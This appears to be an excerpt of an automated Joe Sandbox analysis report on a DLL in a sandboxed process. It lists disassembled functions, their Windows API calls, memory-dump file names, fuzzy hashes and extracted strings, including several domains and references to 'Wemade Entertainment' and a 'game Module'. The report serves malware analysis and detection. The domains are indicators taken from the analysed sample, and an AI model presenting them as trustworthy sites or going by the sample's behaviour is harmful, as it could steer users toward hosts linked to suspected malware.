                                                                                    • Part of subcall function 6A6E0470: GetProcAddress.KERNEL32(00000000), ref: 6A6E0531
                                                                                  • _memset.LIBCMT ref: 6A6D737D
                                                                                  • _memset.LIBCMT ref: 6A6D739A
                                                                                  • _memset.LIBCMT ref: 6A6D73B7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$AddressHandleModuleProc
                                                                                  • String ID: http://www.A3M2.com
                                                                                  • API String ID: 1149923269-8747486
                                                                                  • Opcode ID: 56345cfe8f154dabbc9de2f13d298638ea6aaea2bef43cd9273a80b2b287e73b
                                                                                  • Instruction ID: 751bb916c78992786206315c79cb49d29f5bb6996387b2f78a6bcd48e921d403
                                                                                  • Opcode Fuzzy Hash: 56345cfe8f154dabbc9de2f13d298638ea6aaea2bef43cd9273a80b2b287e73b
                                                                                  • Instruction Fuzzy Hash: 8A3109F15083406BD320E664ED85FDB7BEC9F94348F454928EA98C6182FE70960C87E7
                                                                                  Function 6A6D7070 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D709E
                                                                                    • Part of subcall function 6A6E0470: GetModuleHandleA.KERNEL32 ref: 6A6E052A
                                                                                    • Part of subcall function 6A6E0470: GetProcAddress.KERNEL32(00000000), ref: 6A6E0531
                                                                                  • _memset.LIBCMT ref: 6A6D70FD
                                                                                  • _memset.LIBCMT ref: 6A6D711A
                                                                                  • _memset.LIBCMT ref: 6A6D7137
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$AddressHandleModuleProc
                                                                                  • String ID: http://www.ksfm2.com
                                                                                  • API String ID: 1149923269-2030630099
                                                                                  • Opcode ID: 55f62ef45a23171390da2226fc9ea0e0c8baef785287ab7b0d674c90053ff724
                                                                                  • Instruction ID: 54a8110e783492f85b169edc4ee99c257e41c3c5cc892ea17cd13b6743a74687
                                                                                  • Opcode Fuzzy Hash: 55f62ef45a23171390da2226fc9ea0e0c8baef785287ab7b0d674c90053ff724
                                                                                  • Instruction Fuzzy Hash: 2D31F7F2508340ABD220D764DD85FDB77ED9F94348F49092DEA9986182FE309A0C87E7
                                                                                  Function 6A6D71B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D71DE
                                                                                    • Part of subcall function 6A6E0470: GetModuleHandleA.KERNEL32 ref: 6A6E052A
                                                                                    • Part of subcall function 6A6E0470: GetProcAddress.KERNEL32(00000000), ref: 6A6E0531
                                                                                  • _memset.LIBCMT ref: 6A6D7243
                                                                                  • _memset.LIBCMT ref: 6A6D725A
                                                                                  • _memset.LIBCMT ref: 6A6D7277
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$AddressHandleModuleProc
                                                                                  • String ID: www.KKMir.com
                                                                                  • API String ID: 1149923269-1689476394
                                                                                  • Opcode ID: 011c4064268117f2d4e596577456b15d21286910d7a470d3a0dd9cdcc7e7916b
                                                                                  • Instruction ID: 97d3f688e9428bb4bce5d6607e890f4df29103bcdbf9c5f6874fcf4435803226
                                                                                  • Opcode Fuzzy Hash: 011c4064268117f2d4e596577456b15d21286910d7a470d3a0dd9cdcc7e7916b
                                                                                  • Instruction Fuzzy Hash: 5B31F7B25082846AD220D764ED85FDB77EC9F84348F45092DFA9D87282FE70960C86E7
                                                                                  Function 0BEEF624 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80filesynchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • UnmapViewOfFile.KERNEL32(00000000,00000000,0BEEF74D), ref: 0BEEF6CC
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,0BEEF74D), ref: 0BEEF6EC
                                                                                  • ReleaseMutex.KERNEL32(?,00000000,0BEEF74D), ref: 0BEEF713
                                                                                  • CloseHandle.KERNEL32(?,?,00000000,0BEEF74D), ref: 0BEEF71E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$FileMutexReleaseUnmapView
                                                                                  • String ID: eno198
                                                                                  • API String ID: 809188715-2945690544
                                                                                  • Opcode ID: 8c11749f6924c10ff54765b0c10b7a289d95737e9c1b431ed3d91136b2317686
                                                                                  • Instruction ID: 7d7e2a52be85dfabef9d8789fdb06815dc952c6bc934110d08f84c6f85b547a2
                                                                                  • Opcode Fuzzy Hash: 8c11749f6924c10ff54765b0c10b7a289d95737e9c1b431ed3d91136b2317686
                                                                                  • Instruction Fuzzy Hash: 50313C706212068FEB01EF6AE492A5A77F2EF89244F51B171E424CB7A0D734ED45CBE0
                                                                                  Function 6A6D78A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D78CE
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6D790C
                                                                                  • _memset.LIBCMT ref: 6A6D7923
                                                                                  • _memset.LIBCMT ref: 6A6D7940
                                                                                    • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$LibraryLoad
                                                                                  • String ID: game Module
                                                                                  • API String ID: 1275148839-1822240276
                                                                                  • Opcode ID: 7d944ea52beaf5003c6c38ea2cc76ee1c3a772a8dd9663900486a7801df72da3
                                                                                  • Instruction ID: f939f72445a1fd75ff3a9d3de96c1d07005c2aa7922a1ba57dffb5c3c0755b13
                                                                                  • Opcode Fuzzy Hash: 7d944ea52beaf5003c6c38ea2cc76ee1c3a772a8dd9663900486a7801df72da3
                                                                                  • Instruction Fuzzy Hash: D221C1B2508384AFE220D664DD99FDBB7EC9B98348F44482DE59886152EA70960CC7E7
                                                                                  Function 6A6D6E30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D6E5E
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6D6E9C
                                                                                  • _memset.LIBCMT ref: 6A6D6EB9
                                                                                  • _memset.LIBCMT ref: 6A6D6ED0
                                                                                    • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$LibraryLoad
                                                                                  • String ID: http://www.GeeM2.com
                                                                                  • API String ID: 1275148839-2438832739
                                                                                  • Opcode ID: c61c874e200bb0b822263bccbb4436473a3972e4708a33a18cbac576e1a84dd5
                                                                                  • Instruction ID: d5a2592d620592533886483ad4d5d6b45b0588bbb7be6143e9ce20ae10e3b849
                                                                                  • Opcode Fuzzy Hash: c61c874e200bb0b822263bccbb4436473a3972e4708a33a18cbac576e1a84dd5
                                                                                  • Instruction Fuzzy Hash: 7021B2B16083846AD220D624D995FDB7BED9B88348F44492CE698C6142EE709A0CC7A2
                                                                                  Function 6A6D6F50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D6F7E
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6D6FB6
                                                                                  • _memset.LIBCMT ref: 6A6D6FD3
                                                                                  • _memset.LIBCMT ref: 6A6D6FF0
                                                                                    • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$LibraryLoad
                                                                                  • String ID: Wemade Entertainment
                                                                                  • API String ID: 1275148839-1055062729
                                                                                  • Opcode ID: 53bbf1790d52eaf0f247cf4a03627546bbe3f20e88086b362f2ff27f249fd97b
                                                                                  • Instruction ID: 1fc3a150ef9f9fe134377bd503d06b45138d067e4b0f50167acaffb3f7971318
                                                                                  • Opcode Fuzzy Hash: 53bbf1790d52eaf0f247cf4a03627546bbe3f20e88086b362f2ff27f249fd97b
                                                                                  • Instruction Fuzzy Hash: C421C4F1508384ABD320D624DD95FDB77EC9B98348F44492DE69886292EE749A0C87A3
                                                                                  Function 6A6D7C70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D7C9E
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6D7CD6
                                                                                  • _memset.LIBCMT ref: 6A6D7CF3
                                                                                  • _memset.LIBCMT ref: 6A6D7D10
                                                                                    • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$LibraryLoad
                                                                                  • String ID: http://www.xm2m2.com
                                                                                  • API String ID: 1275148839-1391355098
                                                                                  • Opcode ID: ae49b8c7d0d5ca29138310f43e6636e843d070e63c58e5dd22967bb62a23e283
                                                                                  • Instruction ID: 0b6ecb562d6c6c349b93f63d910122fb71ed3e9287d5fad5156ee3f4b10bb8c8
                                                                                  • Opcode Fuzzy Hash: ae49b8c7d0d5ca29138310f43e6636e843d070e63c58e5dd22967bb62a23e283
                                                                                  • Instruction Fuzzy Hash: 4C21C1B1508384ABD230E724DD99FEB77EC9B98348F44492DE59886252EE70960C87E3
                                                                                  Function 6A6D6D10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D6D3E
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6D6D7C
                                                                                  • _memset.LIBCMT ref: 6A6D6D93
                                                                                  • _memset.LIBCMT ref: 6A6D6DB0
                                                                                    • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$LibraryLoad
                                                                                  • String ID: http://www.Haom6.com
                                                                                  • API String ID: 1275148839-2633146352
                                                                                  • Opcode ID: 8de02069550d2554b456b8d29f9e11010f1fa2d191ac90a111eb146fa27e2d39
                                                                                  • Instruction ID: 578383488c71e41bbe359fe3715f16fec8a352e5145c96363da279569c31c5ba
                                                                                  • Opcode Fuzzy Hash: 8de02069550d2554b456b8d29f9e11010f1fa2d191ac90a111eb146fa27e2d39
                                                                                  • Instruction Fuzzy Hash: 3621C4B15083846AD320D664DD99FDB77EC9B88348F44482CF69886242EE70960CC7E3
                                                                                  Function 6A6DC3B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
